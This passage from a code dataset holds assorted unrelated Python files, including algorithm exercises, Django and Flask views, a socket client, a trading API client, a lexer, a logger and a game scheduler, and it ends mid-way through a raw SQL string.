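    # items: (weight, value) pairs; V[i][w] = best value achievable using
    # the first i items within capacity w -- the same table as dynamicKnapSack.
    n = len(items)
    V = [[0] * (capacity + 1) for _ in range(n + 1)]
    for i in range(1, n + 1):
        weight, value = items[i - 1]
        for w in range(capacity + 1):
            if weight > w:
                V[i][w] = V[i - 1][w]  # item i does not fit
            else:
                V[i][w] = max(V[i - 1][w], value + V[i - 1][w - weight])
    return V[n][capacity]

assert knapsack_max_value([(2, 3), (3, 4), (4, 5)], 5) == 7  # take items 1 and 2
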
user = User.objects.get(username='[NombreDeUsuarioEnAdmin]') --> this didn't work for me; I ran this first and then it did: from django.contrib.auth.models import User\n7. assign_role(user, '[role]') the role name in lowercase\n-> https://www.youtube.com/watch?v=f6Doj2LOIlo\n@author: Juan\n'''\nfrom rolepermissions.roles import AbstractUserRole\n\nclass user(AbstractUserRole):\n    available_permissions = {\n        'access_informe_x': True,\n        'access_informe_y': True,\n        'access_reportes': True,\n    } ","sub_path":"ReportingApp/roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"32257669","text":"import timeit\n\n\ndef req_sum(num):\n    total_sum = 0\n    if len(num) == 1:\n        #print(\"if: \", num)\n        total_sum += num[0]\n    elif len(num) > 1:\n        #print(\"elif: \", num)\n        total_sum += req_sum(num[0:1]) + req_sum(num[1:])\n    return total_sum\n\n\ndef loop_sum(num):\n    total_sum = 0\n    for n in num:\n        total_sum += n\n    return total_sum\n\n\ndef req_factorial(n):\n    multi = 1\n    if n <= 1:\n        multi = 1\n    elif n > 1:\n        multi = n * req_factorial(n - 1)\n    return multi\n\n\ndef loop_factorial(n):\n    multi = 1\n    for m in range(n):\n        multi = multi * (m + 1)\n    return multi\n\n\ntimeit.timeit(setup='import gc; gc.disable(); from __main__ import req_sum',\n              stmt='req_sum([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20])', number=1)\ntimeit.timeit(setup='import gc; gc.disable(); from __main__ import loop_sum',\n              stmt='loop_sum([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20])', number=1)\ntimeit.timeit(setup='import gc; gc.disable(); from __main__ import req_factorial',\n              stmt='req_factorial(100)', number=1)\ntimeit.timeit(setup='import gc; gc.disable(); from __main__ import loop_factorial',\n              stmt='loop_factorial(100)', number=1)\n","sub_path":"interactivepy/recursive_fn_vs_loop_fn.py","file_name":"recursive_fn_vs_loop_fn.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"551756964","text":"###############################################################################\n# Copyright (c) Ray Mansour Salem Investments Inc. (RMS Investments )\n#\n# All rights are reserved. 
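
The recursion-vs-loop entry above times each function with a single call (number=1), which is dominated by timer noise. timeit.repeat amortizes over many calls and several runs; a runnable sketch of the same measurement, with an illustrative summed range and counts:

import timeit

def loop_sum(nums):
    total = 0
    for n in nums:
        total += n
    return total

# Five runs of 10,000 calls each; the minimum is the usual statistic, since
# slower runs mostly measure interference from the rest of the system.
runs = timeit.repeat(
    stmt='loop_sum(data)',
    setup='from __main__ import loop_sum; data = list(range(1, 21))',
    repeat=5,
    number=10000,
)
print(min(runs) / 10000)  # seconds per call
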
Reproduction in whole or in parts is\n# prohibited without the written consent of the copyright owner.\n###############################################################################\nimport pandas as pd\nimport datetime\nfrom numpy import *\nfrom scipy import *\nfrom matplotlib.pyplot import *\n\n# stored as a panel, use unstack to convert to date frame(TBD)\ndfStock = pd.read_hdf(\"stock.google.h5\",\"stock\")\nfor symb in dfStock[\"Close\"].columns:\n\tprint (\"%s:%f\" %(symb,dfStock[\"Close\"][symb][-1]))\n\n#stored as multi-dimensional data frame\ndfGdp = pd.read_hdf(\"gdp.wb.h5\",\"gdp\")\nctry = dfGdp.columns.levels[1] \nind = dfGdp.columns.levels[0][0]\nfor c in ctry:\n\tprint(\"%s:%f\"%(c,dfGdp[ind][c][-1]) )\n\t\ndfIndex = pd.read_hdf(\"index.fred.h5\",\"index\")\nfor idx in dfIndex.columns:\n\tprint(\"%s:%f\" % (idx,dfIndex[idx][-1]) )\n\t\ndfRE = pd.read_hdf(\"real_estate.fred.h5\",\"real_estate\")\ndf = dfRE.interpolate()\nfor idx in df.columns:\n\tprint(\"%s:%f\" % (idx,df[idx][-1]) )\n\n\n\nfigure()\nax1 = subplot('111')\nax2 =ax1.twinx()\n\nax1.plot(dfStock[\"Close\"][\"spy\"],'b')\nax2.plot(dfIndex[\"VIXCLS\"],'k')\nshow()\n\ndfIndex.corrwith(dfStock[\"Close\"][\"aapl\"])","sub_path":"sandbox/process_econ_data_example.py","file_name":"process_econ_data_example.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"496772021","text":"import unittest\nimport solution\n\nTEST_CASE = '''>>><<><>><<<>><>>><<<>>><<<><<<>><>><<>>\n'''\n\n\nclass TestBasic(unittest.TestCase):\n\n def test_get_initial_coords(self):\n self.assertEqual([(2, 3), (3, 3), (4, 3), (5, 3)], solution.get_initial_coords(\n 0, [(0, 0), (1, 0), (2, 0), (3, 0)]))\n\n def test_basic_part1(self):\n data = TEST_CASE.strip()\n self.assertEqual(3068, solution.part1(data, 2022))\n\n def test_part1(self):\n with open(\"input.txt\") as f:\n data = f.read().strip()\n answer = solution.part1(data)\n self.assertEqual(3130, answer)\n\n def test_basic_part2(self):\n data = TEST_CASE.strip()\n self.assertEqual(1514285714288, solution.part2(data))\n\n def test_part2(self):\n with open(\"input.txt\") as f:\n data = f.read().strip()\n answer = solution.part2(data)\n self.assertEqual(883, answer)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"2022-python/day17/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"462733074","text":"import socket\nimport sys\nimport csv\n#main calls functions\ndef main():\n#creates socket and sets port\n global c \n c = socket.socket()\n global host \n host = socket.gethostname()\n global port\n port = 5555\n connSer()\ndef connSer():\n#connects to server and runs the auth\n c.connect((host,port))\n userauth()\n\ndef userauth():\n test = \"Welcome, you may now processed to the rest of the software\"\n user = input (\"Welcome,please enter in your username\\n\")\n userpass = input (\"and now your password\\n\")\n #encodes and recv the data\n print(\"sending data to the server\\n\")\n c.send(user.encode('utf-8'))\n c.send(userpass.encode('utf-8'))\n userlogindataback = c.recv(1024).decode('utf-8')\n print(userlogindataback)\n if userlogindataback == test:\n mainprogram()\n else:\n checklogintimes()\n\ndef checklogintimes():\n count = 0\n while (count <= 3):\n count=+ 1\n print(\"Login Attempt:\" + (str(count)))\n userauth()\n else:\n print(\"to many login attempts, 
the program is going to close now\")\n quit()\n\ndef mainprogram():\n userselected1 = \"You have selected option 1\\n\"\n userselected2 = \"You have selected option 2\\n\"\n userselected3 = \"You have selected option 3\\n\"\n userselected4 = \"You have selected option 4\\n\"\n userselected5 = \"You have selected option 5\\n\"\n userselected6 = \"You have selected option 6\\n\"\n selected = input(\"1.Find IP and Name \\n 2.Get Statistics \\n 3.Sort Data \\n 4.Add Org \\n 5.Remove Org \\n 6. Quit \\n\")\n c.send(selected.encode('utf-8'))\n userselectionback = c.recv(1024).decode('utf-8')\n print(userselectionback)\n if userselectionback == userselected1:\n Option1()\n elif userselectionback == userselected2:\n Option2()\n elif userselectionback == userselected3:\n Option3()\n elif userselectionback == userselected4:\n Option4()\n elif userselectionback == userselected5:\n Option5()\n elif userselectionback == userselected6:\n Option6()\n else:\n print(\"The Selection That You Have Made is Not Valid,Please Try Again\")\n mainprogram() \ndef Option1():\n serversearch = input(\"Enter The Name Of Server Lowercase Please\\n\")\n c.send(serversearch.encode('utf-8'))\n serversearchreturn = c.recv(1024).decode('utf-8')\n print(\"the server ip is:\"+serversearchreturn)\n \n\n\ndef Option2():\n print(\"Two\") \n \ndef Option3():\n sortoption = input(\"Would you like to Sort by Name or Minutes?\")\n sortorder = input(\"Would you like to Sort in Ascending or Descending Order\")\n c.send(sortoption.encode('utf-8'))\n c.send(sortorder.encode('utf-8'))\n sortdatareturn = c.recv(1024).decode('utf-8')\n print(sortdatareturn)\n\n\ndef Option4():\n newname = input(\"Enter In A New Org Name \\n\")\n c.send(newname.encode('utf-8'))\n newdomain = input(\"Enter In A New Domain Name\\n\")\n c.send(newdomain.encode('utf-8'))\n newip = input(\"Enter In A New Ip Address\\n\")\n c.send(newip.encode('utf-8'))\n newmins = input(\"Enter In A Number Of Minutes\\n\")\n c.send(newmins.encode('utf-8'))\n addneworgreturn = c.recv(1024).decode('utf-8')\n print(addneworgreturn)\n\n\n\ndef Option5():\n rmorgname = input(\"Enter an Organisation name to remove \\n\")\n c.send(rmorgname.encode('utf-8'))\n remove_confirm = c.recv(1024).decode('utf-8')\n print(remove_confirm)\n\n\ndef Option6(): \n print(\"The Software Will Now Close, Goodbye\")\n quit()\n \n\nmain()\n","sub_path":"Intro Programming/Python/Network Tool/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"250032993","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport json\nimport uuid\n\nfrom google.appengine.api import modules\nfrom google.appengine.api import taskqueue\n\nfrom app.util.helpers import json_encode, to_ms\n\n\ndef _get_target():\n version_name = modules.get_current_version_name()\n if version_name in ('prod', 'm', 'api', 'batchops', 'mapreducer'):\n return 'batchops'\n return version_name\n\n\nclass TaskBuilder(object):\n @staticmethod\n def _new_task(url, **kwargs):\n kwargs.setdefault('target', _get_target())\n return taskqueue.Task(\n name=kwargs.get('name', uuid.uuid4().hex),\n url=url,\n **kwargs\n )\n\n @classmethod\n def log_params(cls, **kwargs):\n return cls._new_task(\n '/_tasks/util/log_params',\n params=kwargs,\n )\n\n @classmethod\n def log_trace(cls, data, **kwargs):\n kwargs.setdefault('trace_data', data if isinstance(data, basestring) else\n json.dumps(data))\n return 
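
checklogintimes in the client entry above writes count=+ 1, which assigns +1 instead of incrementing, and it re-enters userauth recursively on every failure. A bounded retry loop gives the behaviour the prompt text describes; authenticate here is an illustrative stand-in for the socket round-trip, not code from the entry:

def login_with_retries(authenticate, max_attempts=3):
    # authenticate() should return True on success, False otherwise.
    for attempt in range(1, max_attempts + 1):
        print("Login attempt:", attempt)
        if authenticate():
            return True
    print("Too many login attempts, the program is going to close now")
    return False

# e.g. login_with_retries(lambda: input("password: ") == "Guest")
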
cls._new_task(\n '/_tasks/util/log_trace',\n params=kwargs,\n )","sub_path":"src/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"227142587","text":"import peeweedbevolve\nfrom flask import Blueprint, render_template, flash, request, redirect, url_for, Flask, session, escape\nfrom models.base_model import BaseModel\nfrom models.image import Image\nfrom models.donation import Donation\nfrom flask_login import login_required, current_user\nfrom instagram_web.util.braintree import gateway\n\n\ndonations_blueprint = Blueprint(\n 'donations', __name__, template_folder='templates')\n\n\n@donations_blueprint.route('//new', methods=['GET'])\n@login_required\ndef new(image_id):\n image = Image.get_or_none(Image.id == image_id)\n\n if not image:\n flash('image not found', 'warning')\n return redirect(url_for('home'))\n\n client_token = gateway.client_token.generate()\n\n if not client_token:\n flash('Unable to obtain client token', 'warning')\n return redirect(url_for('home'))\n\n return render_template('donations/new.html', image=image, client_token=client_token,)\n\n\n@donations_blueprint.route('//', methods=['POST'])\n@login_required\ndef create(image_id):\n nonce = request.form.get('payment_method_nonce')\n\n if not nonce:\n flash('credit card details are invalid', 'warning')\n return redirect(url_for('home'))\n\n image = Image.get_or_none(Image.id == image_id)\n\n if not image:\n flash('image not found', 'warning')\n return redirect(url_for('home'))\n\n amount = request.form.get('amount')\n\n if not amount:\n flash('please provide an amount to donate')\n return redirect(url_for('home'))\n\n result = gateway.transaction.sale({\n \"amount\": amount,\n \"payment_method_nonce\": nonce,\n \"options\": {\n \"submit_for_settlement\": True\n }\n })\n\n if not result.is_success:\n flash('unable to complete donation', 'warning')\n return redirect(request.referrer)\n\n donation = Donation(amount=amount, image_id=image.id,\n user_id=current_user.id)\n\n if not donation.save():\n flash('Donation successfull but could not create record', 'warning')\n return redirect(url_for('home'))\n\n flash('Successfully donated RM{amount}', 'success')\n return redirect(url_for('home'))\n","sub_path":"instagram_web/blueprints/donations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"402926160","text":"__author__ = 'Rushil'\r\n\r\n#3 3 9 9 5\r\n\r\nfrom collections import defaultdict\r\nfrom threading import Thread\r\n\r\nn_t = int(input().strip())\r\nm_list = []\r\n\r\nm_dict = defaultdict(list)\r\n\r\nfor _ in range(n_t):\r\n (n,m) = tuple(map(int , input().strip().split(' ')))\r\n m_dict[m] = list(map(int,input().strip().split()))\r\n\r\ndef subsets(m_list,m):\r\n\r\n s = 0\r\n\r\n for i in range(len(m_list)):\r\n for j in range(i):\r\n temp_s = sum(m_list[j:i]) % m\r\n\r\n if temp_s > s:\r\n s = temp_s\r\n\r\n print(s)\r\n\r\ndef bitch():\r\n print('Hello')\r\n\r\nfor i,j in m_dict.items():\r\n Thread(target = subsets , args=(j,i,)).start()","sub_path":"hackerank_maximizesum.py","file_name":"hackerank_maximizesum.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"362969009","text":"\ndef find_ladders(begin_word, end_word):\n q = Queue()\n visited = set()\n\n 
q.enqueue([begin_word])\n    while q.size() > 0:\n        path = q.dequeue()\n        v = path[-1]\n\n        if v not in visited:\n            visited.add(v)\n            if v == end_word:\n                return path\n            \n            for neighbor in get_neighbors(v):\n                path_copy = list(path)\n                path_copy.append(neighbor)\n                q.enqueue(path_copy)\n    return None\n","sub_path":"projects/word_latters.py","file_name":"word_latters.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"239634365","text":"# reads a graph from a file\n# returns a pair (V, E)\ndef read_col_file(filename):\n    with open(filename, 'r') as file:\n        vertices, edges = set(), set()\n        for line in file:\n            line = line.strip()\n            if line.startswith('p'):\n                vertices = set(range(1, int(line.split()[-2]) + 1))\n            elif line.startswith('e'):\n                edges.add(tuple(map(int, line.split()[-2:])))\n        return (vertices, edges)\n\n\nimport random\n\n\n# Takes a graph in the form G=(V, E)\n# Finds a locally minimal partition of the graph\ndef basic_local_search(graph):\n    vertexes = set(graph[0])\n    edges = graph[1]\n    n = len(vertexes)\n\n    # counts the number of edges crossing the cut\n    def f(part0):\n        value = 0\n        for edge in edges:\n            # if the edge connects the two different parts\n            if (edge[0] in part0) != (edge[1] in part0):\n                value += 1\n        return value\n\n    # builds the neighbourhood of a partition\n    def neighbours_of(part0):\n        neighbours = []\n\n        part1 = vertexes - part0\n        # choose which vertices to swap\n        for v0 in part0:\n            for v1 in part1:\n                part = set(part0)\n                part.remove(v0)\n                part.add(v1)\n                neighbours += [part]\n        return neighbours\n\n    # finds the best partition in the neighbourhood\n    def get_best_in_neighbours(part0):\n        best_in_neighbours = part0\n        best_f = f(part0)\n        for new_part0 in neighbours_of(part0):\n            if f(new_part0) < best_f:\n                best_in_neighbours = new_part0\n                best_f = f(new_part0)\n        return best_in_neighbours\n\n    # pick a random initial partition\n    vertexes_shuffle = list(vertexes)\n    random.shuffle(vertexes_shuffle)\n    part0 = set(vertexes_shuffle[:n // 2])\n\n    # move to the best neighbouring partition (while a better one exists)\n    while True:\n        best_in_neighbours = get_best_in_neighbours(part0)\n        if best_in_neighbours == part0:\n            return part0\n        part0 = best_in_neighbours\n\n\nfor i in range(3, 8):\n    filename = 'myciel{}.col'.format(i)\n    graph = read_col_file(filename)\n    part = basic_local_search(graph)\n    print('File {}: partition {}'.format(filename, part))\n","sub_path":"2-1/2-1.py","file_name":"2-1.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"379020282","text":"\"\"\"\nMake request to restful API of Xing bridge server\n\"\"\"\nimport os\nimport pandas as pd\nimport requests\n\n\nclass KiwoomRestAPI:\n    def __init__(self, server_url):\n        self.server_url = server_url  # e.g., http://192.168.0.33:5000\n        self.price_url = os.path.join(server_url, "price")  # e.g., http://192.168.0.33:5000/price\n        self.order_url = os.path.join(server_url, "order")\n        self.balance_url = os.path.join(server_url, "balance")\n\n    def get_price(self, code):\n        \"\"\"\n        code: symbol, in string. e.g., \"233740\".\n        \"\"\"\n        data = {\n            \"code\": code\n        }\n        resp = requests.post(self.price_url, json=data)\n        #print(\"get_price:\", code)\n        #print(resp.status_code)\n        #print(resp.json())\n        return resp.json()\n\n    def market_order(self, accno, code, qty, premarket=False):\n        \"\"\"\n        accno: string of account number to run transaction on.\n        code: (str) Symbol for buying the stock.\n        qty: quantity. 
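
The word-ladder entry above calls q.enqueue/q.dequeue/q.size, which is not the stdlib queue.Queue API, and neither Queue nor get_neighbors is defined in the file. A minimal deque-backed Queue with the interface the entry assumes (an inferred helper, not code from the entry):

from collections import deque

class Queue:
    # FIFO with the enqueue/dequeue/size methods the BFS above expects.
    def __init__(self):
        self._items = deque()

    def enqueue(self, item):
        self._items.append(item)

    def dequeue(self):
        return self._items.popleft()

    def size(self):
        return len(self._items)
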
If below 0, it is a sell order.\n \"\"\"\n if qty == 0:\n return # Nothing to do.\n\n ty = \"premarket\" if premarket else \"market\"\n data = {\n \"qty\": qty,\n \"price\": 0,\n \"code\": code,\n \"type\": ty,\n \"accno\": accno,\n }\n requests.post(self.order_url, json=data)\n\n def limit_order(self, accno, code, qty, price):\n \"\"\"\n accno: string of account number to run transaction on.\n code: (str) Symbol for buying the stock.\n qty: quantity. If below 0, it is a sell order.\n price: price of the limit order\n \"\"\"\n if qty == 0:\n return # Nothing to do.\n\n data = {\n \"qty\": qty,\n \"price\": price,\n \"code\": code,\n \"type\": \"limit\",\n \"accno\": accno,\n }\n requests.post(self.order_url, json=data)\n\n def balance(self, accno):\n \"\"\"\n accno: string of account number to run transaction on.\n Returns: a dict containing item and quantity. For example,\n\n result = {\n \"cash\": 1000000,\n \"233740\": 1\n }\n \"\"\"\n data = {\n \"accno\": accno\n }\n resp = requests.post(self.balance_url, json=data)\n result = resp.json()\n\n # You get '0' as count for things you sold. Remove them.\n to_del = []\n for key, val in result.items():\n if val == 0:\n to_del.append(key)\n for key in to_del:\n del result[key]\n return result\n\n\nif __name__ == \"__main__\":\n import json\n with open(os.path.expanduser(\"~/.kiwoom.json\")) as f:\n args = json.load(f)\n server_url = args[\"server_url\"]\n account_num = args[\"account_num\"]\n\n ex = KiwoomRestAPI(server_url)\n #ex.market_order(account_num, \"233740\", 10)\n #ex.limit_order(account_num, \"233740\", -5, 13000)\n balance = ex.balance(account_num)\n print(balance)\n","sub_path":"quantylab/systrader/kiwoom/bridge_tornado/kiwoom_restful_client.py","file_name":"kiwoom_restful_client.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"386625340","text":"\"\"\"\nTen plik zdobywa randomową klatkę z filmow Idiot Duo i zapisuje ja do pliku 'klatka.jpg'\n\"\"\"\ndef zapisz_klatke():\n import os\n import random\n import youtube_dl\n from ffmpy import FFmpeg\n\n from bot.ids import ids\n\n wybranyFilm = random.choice(ids)\n\n ydl_opts = {\n 'format': '(bestvideo/best)[protocol!=http_dash_segments]'\n }\n ydl = youtube_dl.YoutubeDL(ydl_opts)\n\n with ydl:\n info_dict = ydl.extract_info(wybranyFilm, download=False)\n urlPliku = info_dict.get('url')\n dlugosc = info_dict.get('duration')\n\n losowyCzas = random.uniform(0, dlugosc)\n\n print(f'Calkowita dlugosc = {dlugosc}\\nWybrana dlugosc = {losowyCzas}')\n\n assert 0 <= losowyCzas <= dlugosc, 'Randomowo wybrany losowyCzas nie zawiera sie w przedziale <0;dlugosc>'\n\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'\n inputs = f'-y -user_agent \"{user_agent}\"'\n\n from bot.config import FFMPEG_PATH\n from bot.on_remote import on_remote\n ff = FFmpeg(\n # jesli istnieje environment path do ffmpeg (circleCI[nie zaimplementowano], heroku) to uzyj defaultowej wartosci 'ffmpeg'\n # inaczej dobierz ze .exe ze statica\n executable = FFMPEG_PATH if not on_remote else 'ffmpeg',\n inputs={urlPliku: inputs},\n outputs={os.path.join(os.getcwd(),\"output\", \"klatka.jpg\"): f'-ss {losowyCzas:.2f} -frames:v 1 -q:v 2'})\n\n print(ff.cmd)\n ff.run()\n\nif __name__ == '__main__':\n 
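
balance() in the Kiwoom entry above filters out zero-quantity positions by collecting keys into to_del and deleting them in a second pass (deleting while iterating a dict would fail). A dict comprehension expresses the same filter in one step; the sample balance here is illustrative:

result = {"cash": 1000000, "233740": 0, "005930": 3}
result = {key: qty for key, qty in result.items() if qty != 0}
assert result == {"cash": 1000000, "005930": 3}
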
zapisz_klatke()","sub_path":"bot/randomowa_klatka.py","file_name":"randomowa_klatka.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"398914053","text":"import collections\nimport enum\nimport re\n\n\nToken = collections.namedtuple('Token', ['type', 'value', 'lineno', 'colno'])\n\n\nclass LexError(Exception):\n def __init__(self, value, lineno, colno):\n self.value = value\n self.lineno = lineno\n self.colno = colno\n\n def __str__(self):\n return 'unexpected {}'.format(self.value)\n\n\ndef _make_lexer(rules, eof_type):\n rule_types = [type for type, _ in rules]\n regexp_str = '|'.join('({})'.format(expr) for name, expr in rules) + '|.'\n regexp = re.compile(regexp_str, re.MULTILINE)\n\n def lex(s):\n lineno = 1\n colno = 1\n\n for match in regexp.finditer(s):\n for i, type in enumerate(rule_types):\n m = match.group(i + 1)\n\n if m is not None:\n yield Token(type, m, lineno, colno)\n for c in m:\n if c == '\\n':\n lineno += 1\n colno = 1\n else:\n colno += 1\n break\n else:\n raise LexError(match.group(0), lineno, colno)\n\n yield Token(eof_type, '', lineno, colno)\n\n return lex\n \n\nType = enum.Enum('Type', [\n 'EOF',\n 'COMMENT',\n 'WS',\n 'LBRACE',\n 'RBRACE',\n 'DOT',\n 'COLON',\n 'SEMICOLON',\n 'EQUALS',\n 'LPAREN',\n 'RPAREN',\n 'ENUM',\n 'RECORD',\n 'ALIAS',\n 'IMPORT',\n 'STRING',\n 'SYMBOL',\n 'NUMBER',\n])\n\nSKIPPED_TOKENS = {Type.COMMENT, Type.WS}\n\nlex = _make_lexer([\n (Type.COMMENT, r'#.+\\n'),\n (Type.WS, r'[ \\n\\r]+'),\n (Type.LBRACE, r'\\{'),\n (Type.RBRACE, r'\\}'),\n (Type.DOT, r'\\.'),\n (Type.COLON, r':'),\n (Type.EQUALS, r'='),\n (Type.SEMICOLON, r';'),\n (Type.LPAREN, r'\\('),\n (Type.RPAREN, r'\\)'),\n (Type.RECORD, r'record'),\n (Type.ENUM, r'enum'),\n (Type.ALIAS, r'alias'),\n (Type.IMPORT, r'import'),\n (Type.STRING, r\"'(?:[^\\\\']|\\\\.)*'\" + '|' + r'\"(?:[^\\\\\"]|\\\\.)*\"'),\n (Type.SYMBOL, r'[a-zA-Z_][a-zA-Z0-9_]*'),\n (Type.NUMBER, r'[0-9]+'),\n], Type.EOF)\n\n\ndef lex_cleaned(s):\n return (token for token in lex(s) if token.type not in SKIPPED_TOKENS)\n","sub_path":"admiral/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"205725391","text":"def countOccurences(num, y):\n # 25 %10 = 2\n # 25/=10 = 5\n sum = 0\n while num >= 0:\n if num == 0 and y == 0:\n sum += 1\n break\n\n if num == 0 and y != 0:\n break\n\n digit = num % 10\n if digit == y:\n sum += 1\n\n num //= 10\n\n return sum\n\n\ndef num_occurences(r, y):\n sum = 0;\n for i in range(r + 1):\n sum += countOccurences(i, y)\n return sum\n\n\nprint(str(num_occurences(25, 2)))\n","sub_path":"src/play/find_number_occurences.py","file_name":"find_number_occurences.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"139100398","text":"import logging.handlers\n\n\nclass GetLog():\n\n logger = None\n # 获取日志器方法\n @classmethod\n def get_log(cls):\n\n if cls.logger is None:\n # 获取 日志器\n cls.logger = logging.getLogger()\n # 设置 总级别\n cls.logger.setLevel(logging.INFO)\n # 获取 以时间分隔文件处理,处理器\n th = logging.handlers.TimedRotatingFileHandler(filename=\"../log/hr.log\",\n when=\"midnight\",\n interval=1,\n backupCount=30,\n encoding=\"utf-8\")\n # 设置 处理器级别\n th.setLevel(logging.INFO)\n # 获取 以时间分隔文件处理,处理器\n th_err = logging.handlers.TimedRotatingFileHandler(filename=\"../log/err.log\",\n 
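
_make_lexer in the lexer entry above joins every rule into one alternation regex with a capture group per rule plus a trailing |. catch-all; the first group that matched decides the token type, and the catch-all flags any character no rule covers. The same trick in isolation, with an illustrative three-rule grammar:

import re

rules = [('NUMBER', r'[0-9]+'), ('NAME', r'[a-zA-Z_]+'), ('WS', r'[ \t]+')]
regexp = re.compile('|'.join('({})'.format(expr) for _, expr in rules) + '|.')

def tokens(s):
    for match in regexp.finditer(s):
        for i, (name, _) in enumerate(rules):
            if match.group(i + 1) is not None:
                yield (name, match.group(i + 1))
                break
        else:
            # Only the catch-all '.' matched: no rule covers this character.
            raise SyntaxError('unexpected ' + match.group(0))

assert list(tokens('x 42')) == [('NAME', 'x'), ('WS', ' '), ('NUMBER', '42')]
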
when=\"midnight\",\n interval=1,\n backupCount=30,\n encoding=\"utf-8\")\n # 设置 处理器级别\n th_err.setLevel(logging.ERROR)\n # 获取格式器\n fmt = \"%(asctime)s %(levelname)s [%(name)s] [%(filename)s (%(funcName)s:%(lineno)d] - %(message)s\"\n fm = logging.Formatter(fmt)\n # 将格式器添加到处理器中\n th.setFormatter(fm)\n th_err.setFormatter(fm)\n # 将处理器添加到日志器中\n cls.logger.addHandler(th)\n cls.logger.addHandler(th_err)\n # 返回日志器(日志入口)\n return cls.logger\n\n\nif __name__ == '__main__':\n log = GetLog.get_log()\n log.info(\"info 级别信息测试\")\n log.error(\"error 级别信息测试\")\n log.criticly(\"criticly严重测试\")","sub_path":"tool/ge_log.py","file_name":"ge_log.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"550558118","text":"from apscheduler.schedulers.background import BackgroundScheduler\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\nimport sys, os, django\nsys.path.append(os.path.abspath(os.path.join('..', 'gotcha')))\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gotcha.settings')\ndjango.setup()\nfrom accounts.models import Game\nfrom django.utils import timezone\nfrom time import sleep\n\nscheduler = BackgroundScheduler()\n\ndef loop_job():\n for game in Game.objects.filter(target_assignment_time__isnull=False):\n if timezone.now() > game.target_assignment_time:\n send_targets_and_codes(game.pk)\n \n for game in Game.objects.filter(start_elimination_time__isnull=False):\n if timezone.now() > game.start_elimination_time:\n start_elimination_round(game.pk)\n\n# def say_hello_job():\n# for game in Game.objects.all():\n# if Game.\n\ndef start_elimination_round(game_pk):\n if not Game.objects.filter(pk=game_pk):\n return # just in case the game doesn't exist anymore!\n\n game = Game.objects.get(pk=game_pk)\n\n \"\"\"\n Scenarios:\n 1. move the time forward: ignore older ones, by ensuring that current time (when the task is executed) exceeds the new time\n 2. 
move the time backward: ignore the newer ones, already ensured as the updated task is the first task after the new time (other ones will be in the wrong stage)\n \"\"\"\n if not game.start_elimination_time:\n return\n\n if timezone.now() < game.start_elimination_time: # to make sure the right one is executed\n return\n\n\n\n game.start_elimination_time = None\n game.save()\n if len(game.players().filter(secret_code__isnull=False)) < 2 or not game.in_target_sending:\n return\n\n game.in_progress = True\n game.save()\n\n for player in game.players().filter(secret_code__isnull=False):\n player.last_active = timezone.now()\n player.save()\n\ndef send_targets_and_codes(game_pk):\n if not Game.objects.filter(pk=game_pk):\n return\n \n game = Game.objects.get(pk=game_pk)\n if not game.target_assignment_time:\n return\n\n # prevent any tasks set 5 minutes past the assignment time to be executed!\n if timezone.now() < game.target_assignment_time:\n return \n\n game.target_assignment_time = None # if correct, clear it, if wrong phase, clear it too\n game.save()\n if game.in_registration:\n game.reset()\n\nscheduler.add_job(loop_job, 'interval', seconds=3)\n\nscheduler.start()\n\nwhile True:\n sleep(60)\n\n","sub_path":"accounts/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"599026852","text":"from django.shortcuts import render, redirect, HttpResponseRedirect\nfrom places.models import Place\nfrom house.models import House\nfrom tour.models import Tour, BookTour, PlaceTour\nfrom tourer.models import Tourer, Account\nfrom django.contrib import messages\n\n# Create your views here.\ndef home(request):\n places = Place.objects.all().order_by('-id')[:8]\n houses = House.objects.all().order_by('-id')[:3]\n query = \"SELECT *,(sum(a.price) * t.person) as 